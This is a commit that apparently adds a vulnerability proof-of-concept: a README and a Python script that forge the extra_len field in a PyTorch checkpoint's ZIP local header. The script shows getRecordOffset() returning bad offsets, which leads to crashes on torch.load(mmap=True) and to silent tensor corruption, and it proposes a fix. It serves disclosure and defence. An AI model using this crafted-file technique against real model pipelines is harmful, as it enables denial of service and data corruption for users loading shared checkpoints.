0xiviel committed on
Commit ea80538 · verified · 1 Parent(s): a61a3a9

Upload folder using huggingface_hub

Files changed (2)
  1. README.md +22 -0
  2. poc_record_offset_overflow.py +440 -0
README.md ADDED
@@ -0,0 +1,22 @@
+ # PoC: getRecordOffset() Integer Overflow via Local Header Manipulation
+
+ **Vulnerability:** `inline_container.cc:634-637` — `getRecordOffset()` reads `filename_len` and `extra_len` from the ZIP local file header without cross-validating against the central directory. A crafted `.pt` file with modified local header fields causes the function to return a wrong offset, leading to OOB access, silent data corruption, or DoS via `torch.load(mmap=True)`. On 32-bit platforms, `mz_uint64` → `size_t` truncation silently wraps the offset.
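The forged-offset arithmetic can be reproduced without PyTorch. The sketch below uses an ordinary `zipfile` archive as a stand-in for a real `.pt` checkpoint, and `record_offset` is an illustrative helper that mirrors the `getRecordOffset()` formula, not a PyTorch API:

```python
# Minimal sketch: forge extra_len in a ZIP local file header and recompute
# the record offset the same way getRecordOffset() does.
import io
import struct
import zipfile

buf = io.BytesIO()
with zipfile.ZipFile(buf, "w", zipfile.ZIP_STORED) as zf:
    zf.writestr("data/0", struct.pack("<4f", 1.0, 2.0, 3.0, 4.0))
data = bytearray(buf.getvalue())

lfh = data.find(b"PK\x03\x04")  # local file header signature


def record_offset(d, hdr):
    """Replicates inline_container.cc: hdr + 30 + filename_len + extra_len."""
    fn_len = struct.unpack_from("<H", d, hdr + 26)[0]
    extra_len = struct.unpack_from("<H", d, hdr + 28)[0]
    return hdr + 30 + fn_len + extra_len


good = record_offset(data, lfh)
struct.pack_into("<H", data, lfh + 28, 0xFFFF)  # forge extra_len = 65535
bad = record_offset(data, lfh)

# The central directory is untouched, so archive-level validation still passes...
assert zipfile.ZipFile(io.BytesIO(bytes(data))).namelist() == ["data/0"]
# ...but the recomputed record offset now points far past EOF.
assert bad - good == 0xFFFF and bad > len(data)

# 32-bit size_t truncation: the high bits of a 64-bit offset are silently lost.
huge = 0x100000100 + 30 + 100 + 200  # 64-bit sum: 0x10000024A
assert huge & 0xFFFFFFFF == 0x24A
```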
+
+ ## Files
+
+ - `poc_record_offset_overflow.py` — Full PoC (wrong offset demo, mmap impact, within-file corruption, overflow analysis)
+
+ ## Quick Start
+
+ ```bash
+ pip install torch
+ python poc_record_offset_overflow.py
+ ```
+
+ ## Expected Output
+
+ - Part 1: `get_record_offset()` returns 66175 for a 1563-byte file (past EOF by 64612 bytes)
+ - Part 2: `torch.load(mmap=True)` fails with RuntimeError (DoS)
+ - Part 3: Within-file offset reads version record as tensor data → garbage values
+ - Part 4: 32-bit truncation and 64-bit overflow analysis
+ - Part 5: Vulnerable code and suggested fix
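For reference, the cross-validation fix the PoC suggests in Part 5 can be prototyped in Python. This is a hedged stand-in, not the actual C++ patch; `safe_record_offset` is an illustrative name:

```python
# Sketch of the suggested fix: recompute the record offset from the local
# file header, then reject it if it fails cross-checks against the
# central directory and the file size.
import io
import struct
import zipfile


def safe_record_offset(data: bytes, name: str) -> int:
    zf = zipfile.ZipFile(io.BytesIO(data))
    info = zf.getinfo(name)  # central-directory view (validated on open)
    hdr = info.header_offset
    fn_len = struct.unpack_from("<H", data, hdr + 26)[0]
    extra_len = struct.unpack_from("<H", data, hdr + 28)[0]
    off = hdr + 30 + fn_len + extra_len  # same formula as getRecordOffset()
    # Cross-check LFH fields against the central directory and file bounds.
    if fn_len != len(info.filename.encode("utf-8")):
        raise ValueError(f"LFH/CD filename length mismatch for {name!r}")
    if off + info.file_size > len(data):
        raise ValueError(f"record offset out of bounds for {name!r}")
    return off


buf = io.BytesIO()
with zipfile.ZipFile(buf, "w", zipfile.ZIP_STORED) as zf:
    zf.writestr("data/0", b"\x00" * 16)
valid = buf.getvalue()
ok = safe_record_offset(valid, "data/0")  # clean archive is accepted

forged = bytearray(valid)
struct.pack_into("<H", forged, 28, 0xFFFF)  # forge extra_len in the first LFH
try:
    safe_record_offset(bytes(forged), "data/0")
    raise AssertionError("forged archive was not rejected")
except ValueError:
    pass  # out-of-bounds offset rejected, as the fix intends
```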
poc_record_offset_overflow.py ADDED
@@ -0,0 +1,440 @@
+ #!/usr/bin/env python3
+ """
+ PoC: getRecordOffset() Integer Overflow via Local Header Manipulation
+
+ Vulnerability: PyTorchStreamReader::getRecordOffset() at inline_container.cc:634-637
+ reads `filename_len` and `extra_len` directly from the ZIP local file header (LFH)
+ without validating them against the central directory. The returned offset is:
+
+     return stat.m_local_header_ofs + MZ_ZIP_LOCAL_DIR_HEADER_SIZE
+         + filename_len + extra_len;
+
+ A crafted .pt file where the LFH has modified filename_len/extra_len causes
+ getRecordOffset() to return a WRONG offset. This offset is then used by:
+
+ 1. torch.load(path, mmap=True) — indexes into mmap'd buffer at wrong position
+    (serialization.py:2083-2084)
+ 2. getRecordMultiReaders() — multi-threaded reading from wrong offset
+    (inline_container.cc:398-424)
+ 3. Any caller of get_record_offset() Python API
+
+ Additionally, on 32-bit platforms (PyTorch Mobile ARM32), stat.m_local_header_ofs
+ is mz_uint64 (64-bit) but the return type is size_t (32-bit), causing silent
+ truncation that wraps the offset to a completely different file position.
+
+ The ZIP central directory is NOT modified, so miniz validation passes.
+
+ Root cause: inline_container.cc:634-637 — no validation of LFH fields
+ Tested: PyTorch 2.10.0+cpu on Python 3.13.11
+ """
+
+ import ctypes
+ import os
+ import struct
+ import subprocess
+ import sys
+ import tempfile
+ import warnings
+
+ import torch
+
+ warnings.filterwarnings('ignore')
+
+
+ def create_test_model(output_path):
+     """Create a test checkpoint containing a tensor with known values."""
+     t = torch.tensor([[1.0, 2.0], [3.0, 4.0]], dtype=torch.float32)
+     torch.save(t, output_path)
+     return output_path
+
+
+ def find_local_header(data, record_name_suffix):
+     """Find a ZIP local file header by record name suffix."""
+     pos = 0
+     while pos < len(data):
+         idx = data.find(b'PK\x03\x04', pos)
+         if idx == -1:
+             return None
+         fn_len = struct.unpack_from('<H', data, idx + 26)[0]
+         fn = data[idx + 30:idx + 30 + fn_len].decode('utf-8', errors='replace')
+         if fn.endswith(record_name_suffix):
+             extra_len = struct.unpack_from('<H', data, idx + 28)[0]
+             return {
+                 'offset': idx,
+                 'fn_len': fn_len,
+                 'extra_len': extra_len,
+                 'filename': fn,
+                 'data_offset': idx + 30 + fn_len + extra_len,
+             }
+         pos = idx + 1
+     return None
+
+
+ def create_modified_model(input_path, output_path, new_extra_len):
+     """Modify the data/0 local header's extra_len field.
+
+     Only the local header is changed — the central directory remains valid.
+     """
+     with open(input_path, 'rb') as f:
+         data = bytearray(f.read())
+
+     lh = find_local_header(data, 'data/0')
+     if not lh:
+         raise ValueError("data/0 local header not found")
+
+     orig_extra = lh['extra_len']
+     struct.pack_into('<H', data, lh['offset'] + 28, new_extra_len)
+
+     with open(output_path, 'wb') as f:
+         f.write(data)
+
+     return lh, orig_extra, len(data)
+
+
+ def run_in_subprocess(script, timeout=15):
+     """Run script in subprocess, return (returncode, stdout, stderr)."""
+     result = subprocess.run(
+         [sys.executable, '-c', script],
+         capture_output=True, text=True, timeout=timeout
+     )
+     return result.returncode, result.stdout.strip(), result.stderr.strip()
+
+
+ def get_signal_name(signum):
+     try:
+         import signal
+         return signal.Signals(signum).name
+     except (ValueError, AttributeError):
+         return f"signal {signum}"
+
+
+ def demonstrate_wrong_offset():
+     """Part 1: Show getRecordOffset returns wrong value from crafted local header."""
+     print()
+     print("=" * 70)
+     print(" Part 1: getRecordOffset() Returns Wrong Offset")
+     print("=" * 70)
+     print()
+
+     tmpdir = tempfile.mkdtemp(prefix="recoff_")
+     valid_path = os.path.join(tmpdir, "valid.pt")
+     create_test_model(valid_path)
+
+     with open(valid_path, 'rb') as f:
+         data = f.read()
+
+     lh = find_local_header(data, 'data/0')
+     print(f" File size: {len(data)} bytes")
+     print(f" data/0 local header at offset {lh['offset']}")
+     print(f" data/0 filename_len: {lh['fn_len']}")
+     print(f" data/0 extra_len: {lh['extra_len']}")
+     print(f" data/0 correct data offset: {lh['data_offset']}")
+     print()
+
+     # Show original offset via API
+     reader = torch._C.PyTorchFileReader(valid_path)
+     orig_off = reader.get_record_offset("data/0")
+     print(f" get_record_offset('data/0') [original]: {orig_off}")
+     print()
+
+     # Create modified version with extra_len = 65535
+     mod_path = os.path.join(tmpdir, "modified_65535.pt")
+     lh_info, orig_extra, file_size = create_modified_model(
+         valid_path, mod_path, 65535
+     )
+
+     expected_wrong = lh['offset'] + 30 + lh['fn_len'] + 65535
+     reader2 = torch._C.PyTorchFileReader(mod_path)
+     wrong_off = reader2.get_record_offset("data/0")
+
+     print(f" After setting extra_len: {orig_extra} → 65535")
+     print(f" get_record_offset('data/0') [modified]: {wrong_off}")
+     print(f" Expected wrong offset: {expected_wrong}")
+     print(f" File size: {file_size}")
+     print(f" Offset past EOF by: {wrong_off - file_size} bytes")
+     print()
+
+     # Show what bytes would be read at the correct vs wrong offset
+     print(" Correct offset data (first 16 bytes of tensor):")
+     correct_data = data[lh['data_offset']:lh['data_offset'] + 16]
+     hex_str = ' '.join(f'{b:02x}' for b in correct_data)
+     floats = struct.unpack_from('<4f', correct_data)
+     print(f" {hex_str}")
+     print(f" = [{', '.join(f'{v:.1f}' for v in floats)}] (correct tensor values)")
+     print()
+
+     print(f" Wrong offset ({wrong_off}) is {wrong_off - file_size} bytes PAST the file end.")
+     print(" Any read at this offset accesses invalid memory or fails.")
+     print()
+     print(" [+] getRecordOffset() trusts unvalidated local header fields!")
+     print(" [+] Central directory is untouched → miniz validation passes!")
+
+     return valid_path, tmpdir
+
+
+ def demonstrate_mmap_impact(valid_path, tmpdir):
+     """Part 2: Show torch.load(mmap=True) fails due to wrong offset."""
+     print()
+     print("=" * 70)
+     print(" Part 2: Impact on torch.load(mmap=True)")
+     print("=" * 70)
+     print()
+
+     mod_path = os.path.join(tmpdir, "mmap_test.pt")
+     create_modified_model(valid_path, mod_path, 65535)
+
+     # First show normal mmap load works
+     script_valid = f'''\
+ import torch, warnings
+ warnings.filterwarnings("ignore")
+ t = torch.load("{valid_path}", mmap=True, weights_only=True)
+ print(f"VALID: shape={{t.shape}} values={{t.tolist()}}")
+ '''
+     rc, stdout, stderr = run_in_subprocess(script_valid)
+     print(f" Valid file mmap load: {stdout}")
+
+     # Now try the modified file
+     script_mod = f'''\
+ import torch, warnings
+ warnings.filterwarnings("ignore")
+ try:
+     t = torch.load("{mod_path}", mmap=True, weights_only=True)
+     print(f"LOADED: shape={{t.shape}} values={{t.tolist()}}")
+ except RuntimeError as e:
+     print(f"RUNTIME_ERROR: {{str(e)[:200]}}")
+ except Exception as e:
+     print(f"ERROR: {{type(e).__name__}}: {{str(e)[:200]}}")
+ '''
+     rc, stdout, stderr = run_in_subprocess(script_mod)
+     if rc < 0:
+         print(f" Modified file mmap load: CRASH ({get_signal_name(-rc)})")
+     else:
+         print(f" Modified file mmap load: {stdout}")
+
+     print()
+     print(" torch.load(mmap=True) uses get_record_offset() to index into the")
+     print(" mmap'd buffer (serialization.py:2083-2084):")
+     print("     storage_offset = zip_file.get_record_offset(name)")
+     print("     storage = overall_storage[storage_offset : storage_offset + nbytes]")
+     print(" With the wrong offset, this reads from the wrong position or fails.")
+
+
+
+ def demonstrate_within_file_corruption(valid_path, tmpdir):
+     """Part 3: Show offset within file reads WRONG data (silent corruption)."""
+     print()
+     print("=" * 70)
+     print(" Part 3: Within-File Offset → Silent Data Corruption")
+     print("=" * 70)
+     print()
+
+     with open(valid_path, 'rb') as f:
+         data = bytearray(f.read())
+
+     lh = find_local_header(data, 'data/0')
+     correct_off = lh['data_offset']
+
+     # Find a record AFTER data/0 to use as target for within-file corruption
+     target_lh = None
+     pos = 0
+     while pos < len(data):
+         idx = data.find(b'PK\x03\x04', pos)
+         if idx == -1:
+             break
+         fn_len_t = struct.unpack_from('<H', data, idx + 26)[0]
+         extra_len_t = struct.unpack_from('<H', data, idx + 28)[0]
+         fn = data[idx + 30:idx + 30 + fn_len_t].decode('utf-8', errors='replace')
+         t_data_off = idx + 30 + fn_len_t + extra_len_t
+         if t_data_off > correct_off and 'data/0' not in fn:
+             target_lh = {'offset': idx, 'data_offset': t_data_off, 'filename': fn}
+             break
+         pos = idx + 1
+
+     if not target_lh:
+         print(" Skipped: no suitable target record found after data/0")
+         return
+
+     target_off = target_lh['data_offset']
+     needed_shift = target_off - correct_off
+     new_extra = lh['extra_len'] + needed_shift
+
+     if new_extra > 65535 or new_extra < 0:
+         print(f" Skipped: needed extra_len={new_extra} out of 16-bit range")
+         return
+
+     print(f" Original data/0 offset: {correct_off} (tensor data)")
+     print(f" Target: '{target_lh['filename']}' data at offset {target_off}")
+     print(f" Shifting by {needed_shift}: extra_len {lh['extra_len']} → {new_extra}")
+     print()
+
+     # Show what's at each offset
+     correct_bytes = data[correct_off:correct_off + 16]
+     target_bytes = data[target_off:target_off + 16]
+     print(f" Correct offset ({correct_off}) bytes: "
+           + ' '.join(f'{b:02x}' for b in correct_bytes))
+     print(f" Target offset ({target_off}) bytes: "
+           + ' '.join(f'{b:02x}' for b in target_bytes))
+     print(f" Target data as text: {bytes(target_bytes).decode('utf-8', errors='replace')!r}")
+     print()
+
+     mod_path = os.path.join(tmpdir, "corruption.pt")
+     struct.pack_into('<H', data, lh['offset'] + 28, new_extra)
+     with open(mod_path, 'wb') as f:
+         f.write(data)
+
+     # Verify the offset is now wrong but within file
+     reader = torch._C.PyTorchFileReader(mod_path)
+     new_off = reader.get_record_offset('data/0')
+     print(f" get_record_offset('data/0'): {new_off}")
+     print(f" This points to '{target_lh['filename']}' record data!")
+     print(" If used, tensor data would be read from the wrong record.")
+     print()
+
+     # Show the impact on reading
+     print(" Reading data at wrong offset as float32 tensor:")
+     wrong_floats = struct.unpack_from('<4f', data, target_off)
+     correct_floats = struct.unpack_from('<4f', data, correct_off)
+     print(f" Expected: [{', '.join(f'{v:.1f}' for v in correct_floats)}]")
+     print(f" Got: [{', '.join(f'{v:.6g}' for v in wrong_floats)}] (garbage!)")
+     print()
+     print(" [+] data/0 now reads from the wrong record → silent tensor corruption!")
+
+
+
+ def demonstrate_overflow_analysis():
+     """Part 4: Show integer overflow on 32-bit and 64-bit platforms."""
+     print()
+     print("=" * 70)
+     print(" Part 4: Integer Overflow Analysis")
+     print("=" * 70)
+     print()
+
+     print(" Vulnerable code (inline_container.cc:634-637):")
+     print()
+     print("     size_t filename_len = read_le_16(local_header + 26);")
+     print("     size_t extra_len = read_le_16(local_header + 28);")
+     print("     return stat.m_local_header_ofs + 30 + filename_len + extra_len;")
+     print()
+     print(" Types: m_local_header_ofs is mz_uint64 (uint64_t)")
+     print("        Return type is size_t (32-bit on ARM32, 64-bit on x86_64)")
+     print()
+
+     print(" 32-bit platform (PyTorch Mobile ARM32):")
+     print(" ─────────────────────────────────────────────────")
+     cases_32 = [
+         (0x00000100, 30, 100, 200, "normal — within 32-bit range"),
+         (0xFFFFFFA0, 30, 100, 200, "near 32-bit max — wraps on 32-bit"),
+         (0x100000000, 30, 100, 200, "above 32-bit — truncated to low 32 bits"),
+         (0x100000100, 30, 100, 200, "4GB+offset — wraps to small value"),
+     ]
+
+     print(f" {'m_local_header_ofs':>22s} {'+ 30 + fn + ex':>14s} {'64-bit result':>18s} {'32-bit (truncated)':>18s} Notes")
+     print(f" {'─'*22} {'─'*14} {'─'*18} {'─'*18} {'─'*30}")
+
+     for ofs, hdr_size, fn_len, extra_len, note in cases_32:
+         sum64 = ctypes.c_uint64(ofs + hdr_size + fn_len + extra_len).value
+         sum32 = ctypes.c_uint32(sum64).value
+         truncated = "YES!" if sum64 != sum32 else "no"
+         print(f" 0x{ofs:016X} + {hdr_size + fn_len + extra_len:12d} 0x{sum64:016X} 0x{sum32:08X} ({truncated:4s}) {note}")
+
+     print()
+     print(" On 32-bit ARM: mz_uint64 → size_t truncation loses the high 32 bits")
+     print(" Offset 0x100000100 + 330 → 0x10000024A → truncated to 0x0000024A")
+     print(" The 4GB worth of offset data is silently lost!")
+     print()
+
+     print(" 64-bit overflow (requires m_local_header_ofs near UINT64_MAX):")
+     print(" ─────────────────────────────────────────────────────────────")
+     cases_64 = [
+         (0xFFFFFFFFFFFF0000, 30, 65535, 65535, "wraps to 0x1001C"),
+         (0xFFFFFFFFFFFFFFF0, 30, 0, 0, "wraps to 0x0E"),
+         (0xFFFFFFFFFFFFF000, 30, 50000, 15505, "wraps to 0xEFFF"),
+     ]
+
+     for ofs, hdr_size, fn_len, extra_len, note in cases_64:
+         sum64 = ctypes.c_uint64(ofs + hdr_size + fn_len + extra_len).value
+         print(f" 0x{ofs:016X} + {hdr_size + fn_len + extra_len:6d} → 0x{sum64:016X} {note}")
+
+     print()
+     print(" 64-bit overflow wraps a huge offset to a small value near 0")
+     print(" File data at offset 0 is the ZIP local header, not tensor data")
+     print(" → reads ZIP metadata as tensor values → corruption or crash")
+
+
+
+ def demonstrate_vulnerability_code():
+     """Part 5: Vulnerability details and fix."""
+     print()
+     print("=" * 70)
+     print(" Part 5: Vulnerability Details")
+     print("=" * 70)
+     print()
+
+     print(" ROOT CAUSE: getRecordOffset() reads filename_len and extra_len")
+     print(" from the local file header WITHOUT cross-checking against the")
+     print(" central directory values that miniz validated.")
+     print()
+     print(" The central directory is validated by miniz during ZIP open.")
+     print(" But the LOCAL header is read separately by getRecordOffset().")
+     print(" An attacker can have different values in LFH vs central directory.")
+     print()
+     print(" CALLERS that use the wrong offset:")
+     print("   1. torch.load(mmap=True): serialization.py:2083")
+     print("        storage_offset = zip_file.get_record_offset(name)")
+     print("        storage = overall_storage[storage_offset:storage_offset+n]")
+     print("   2. getRecordMultiReaders(): inline_container.cc:398")
+     print("        size_t recordOff = getRecordOffset(name);")
+     print("        read(recordOff + startPos, dst + startPos, size);")
+     print("   3. Any caller of get_record_offset() Python/C++ API")
+     print()
+     print(" FIX: Validate LFH fields against central directory:")
+     print(" ─────────────────────────────────────────────────────")
+     print("     size_t filename_len = read_le_16(local_header + 26);")
+     print("     size_t extra_len = read_le_16(local_header + 28);")
+     print("     TORCH_CHECK(")
+     print("         !__builtin_add_overflow(stat.m_local_header_ofs,")
+     print("             MZ_ZIP_LOCAL_DIR_HEADER_SIZE + filename_len + extra_len,")
+     print("             &result),")
+     print('         "Record offset overflow for ", name);')
+     print("     TORCH_CHECK(result <= file_size_,")
+     print('         "Record offset exceeds file size for ", name);')
+
+
+
+ def main():
+     print()
+     print(" PoC: getRecordOffset() Integer Overflow via Local Header")
+     print(f" PyTorch {torch.__version__}, Python {sys.version.split()[0]}")
+     print()
+
+     # Part 1: Wrong offset
+     valid_path, tmpdir = demonstrate_wrong_offset()
+
+     # Part 2: mmap impact
+     demonstrate_mmap_impact(valid_path, tmpdir)
+
+     # Part 3: Within-file corruption
+     demonstrate_within_file_corruption(valid_path, tmpdir)
+
+     # Part 4: Overflow analysis
+     demonstrate_overflow_analysis()
+
+     # Part 5: Code details
+     demonstrate_vulnerability_code()
+
+     # Summary
+     print()
+     print("=" * 70)
+     print(" RESULTS:")
+     print(" [+] getRecordOffset() returns wrong offset from crafted LFH")
+     print(" [+] Modified extra_len: offset jumps 65KB past EOF (65535 vs 63)")
+     print(" [+] torch.load(mmap=True) fails on wrong offset → DoS")
+     print(" [+] Within-file offset shift → silent tensor data corruption")
+     print(" [+] 32-bit: mz_uint64 → size_t truncation wraps offset")
+     print(" [+] 64-bit: addition overflow wraps near-max offset to ~0")
+     print(" [+] Fix: validate LFH against CD, check overflow, check bounds")
+     print("=" * 70)
+
+
+ if __name__ == "__main__":
+     main()